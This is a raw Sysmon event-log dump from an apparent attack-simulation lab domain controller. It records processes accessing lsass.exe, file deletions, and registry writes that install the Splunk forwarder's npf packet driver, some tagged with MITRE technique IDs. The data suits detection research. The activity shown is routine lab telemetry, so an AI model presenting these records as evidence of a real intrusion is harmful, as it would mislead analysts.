10341000x80000000000000008507Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:02.051{266CAFBE-646C-6064-1300-00000000AE01}12281396C:\Windows\System32\svchost.exe{266CAFBE-646C-6064-1200-00000000AE01}1196C:\Windows\system32\svchost.exe0x1440C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|c:\windows\system32\ncbservice.dll+2f95|c:\windows\system32\ncbservice.dll+2e77|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000008506Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:02.051{266CAFBE-646A-6064-0B00-00000000AE01}856NT AUTHORITY\SYSTEMC:\Windows\system32\lsass.exeC:\Windows\ServiceProfiles\LocalService\AppData\Roaming\Microsoft\Crypto\Keys\de7cf8a7901d2ad13e5c67c29e5d1662_a4ee36bd-fd63-46a0-a49f-c2b42395fbd8MD5=E2B1E53F26985BC0BC2A99C7D107A1D1,SHA256=3DC463A76FC170607C07B104C3CB531362CE7D6E10C1A34E0C0F370AEAE08CE8,IMPHASH=00000000000000000000000000000000falsefalse - shredded file with pattern 0x00 23542300x80000000000000008505Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:02.051{266CAFBE-646A-6064-0B00-00000000AE01}856NT 
AUTHORITY\SYSTEMC:\Windows\system32\lsass.exeC:\Windows\ServiceProfiles\LocalService\AppData\Roaming\Microsoft\Crypto\Keys\de7cf8a7901d2ad13e5c67c29e5d1662_a4ee36bd-fd63-46a0-a49f-c2b42395fbd8MD5=40489A5F251275967BCAC92A594C210C,SHA256=5F54121BB1590A36EBFD2DCDDDF4A66300AA09CE7C9B6B70B6BA132287EBFACA,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000008504Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:02.020{266CAFBE-646C-6064-1300-00000000AE01}12281396C:\Windows\System32\svchost.exe{266CAFBE-646C-6064-1200-00000000AE01}1196C:\Windows\system32\svchost.exe0x1440C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|c:\windows\system32\ncbservice.dll+2f95|c:\windows\system32\ncbservice.dll+2e77|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008503Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:03:02.020{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008502Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:02.020{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008501Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:03:02.020{266CAFBE-646A-6064-0B00-00000000AE01}8561016C:\Windows\system32\lsass.exe{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008574Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:03.984{266CAFBE-64C4-6064-9E00-00000000AE01}31204072C:\Windows\system32\taskhostw.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d832|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008573Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:03:03.906{266CAFBE-646A-6064-0A00-00000000AE01}8401248C:\Windows\system32\services.exe{266CAFBE-64F7-6064-0801-00000000AE01}4280C:\Windows\system32\sppsvc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\services.exe+1713f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008572Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:03.906{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-64F7-6064-0801-00000000AE01}4280C:\Windows\system32\sppsvc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008571Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:03:03.844{266CAFBE-6469-6064-0500-00000000AE01}6241132C:\Windows\system32\csrss.exe{266CAFBE-64F7-6064-0801-00000000AE01}4280C:\Windows\system32\sppsvc.exe0x103800C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000008570Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:03.844{266CAFBE-646A-6064-0A00-00000000AE01}840900C:\Windows\system32\services.exe{266CAFBE-64F7-6064-0801-00000000AE01}4280C:\Windows\system32\sppsvc.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+307d|C:\Windows\system32\services.exe+6334|C:\Windows\system32\services.exe+dc24|C:\Windows\system32\services.exe+d248|C:\Windows\system32\services.exe+1643d|C:\Windows\SYSTEM32\ntdll.dll+7f3fd|C:\Windows\SYSTEM32\ntdll.dll+3a890|C:\Windows\SYSTEM32\ntdll.dll+1e892|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008569Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:03:03.766{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008568Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:03.766{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008567Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:03:03.766{266CAFBE-646A-6064-0B00-00000000AE01}8561016C:\Windows\system32\lsass.exe{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008566Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:03.641{266CAFBE-64F5-6064-0301-00000000AE01}65005408C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe+2016cb|C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe+a6e213|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 644600x80000000000000008565Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:03.641C:\Program 
Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\npf.sysMD5=DE7FCC77F4A503AF4CA6A47D49B3713D,SHA256=4BFAA99393F635CD05D91A64DE73EDB5639412C129E049F0FE34F88517A10FC6,IMPHASH=CB86059F4B291991E735BECBD4C669CBtrueRiverbed Technology, Inc.Valid 10341000x80000000000000008564Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:03.641{266CAFBE-646A-6064-0B00-00000000AE01}8561016C:\Windows\system32\lsass.exe{266CAFBE-64F6-6064-0501-00000000AE01}4136C:\Windows\System32\msdtc.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008563Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:03:03.641{266CAFBE-646A-6064-0B00-00000000AE01}8561016C:\Windows\system32\lsass.exe{266CAFBE-64F6-6064-0501-00000000AE01}4136C:\Windows\System32\msdtc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 13241300x80000000000000008562Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:03:03.641{266CAFBE-6467-6064-0100-00000000AE01}4SystemHKLM\System\CurrentControlSet\Services\PACKETDRIVER\NdisMinorVersionDWORD (0x00000000) 13241300x80000000000000008561Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:03:03.641{266CAFBE-6467-6064-0100-00000000AE01}4SystemHKLM\System\CurrentControlSet\Services\PACKETDRIVER\NdisMajorVersionDWORD (0x00000005) 13241300x80000000000000008560Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:03:03.641{266CAFBE-6467-6064-0100-00000000AE01}4SystemHKLM\System\CurrentControlSet\Services\npf\TimestampModeDWORD (0x00000000) 13241300x80000000000000008559Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:03:03.625{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\npf\DisplayNamenpf 
13241300x80000000000000008558Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.localT1031,T1050SetValue2021-03-31 12:03:03.625{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\npf\ImagePath\??\C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\npf.sys 13241300x80000000000000008557Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:03:03.625{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\npf\ErrorControlDWORD (0x00000001) 13241300x80000000000000008556Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.localT1031,T1050SetValue2021-03-31 12:03:03.625{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\npf\StartDWORD (0x00000003) 13241300x80000000000000008555Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:03:03.625{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\npf\TypeDWORD (0x00000001) 10341000x80000000000000008554Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:03.438{266CAFBE-64EE-6064-D900-00000000AE01}53082340C:\Windows\system32\conhost.exe{266CAFBE-64F7-6064-0701-00000000AE01}6380C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008553Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:03:03.438{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008552Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:03.438{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008551Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:03:03.438{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008550Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:03.438{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008549Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:03.438{266CAFBE-6469-6064-0500-00000000AE01}6242352C:\Windows\system32\csrss.exe{266CAFBE-64F7-6064-0701-00000000AE01}6380C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000008548Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:03.438{266CAFBE-64ED-6064-D500-00000000AE01}56481476C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{266CAFBE-64F7-6064-0701-00000000AE01}6380C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000008547Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:03.299{266CAFBE-64F7-6064-0701-00000000AE01}6380C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK 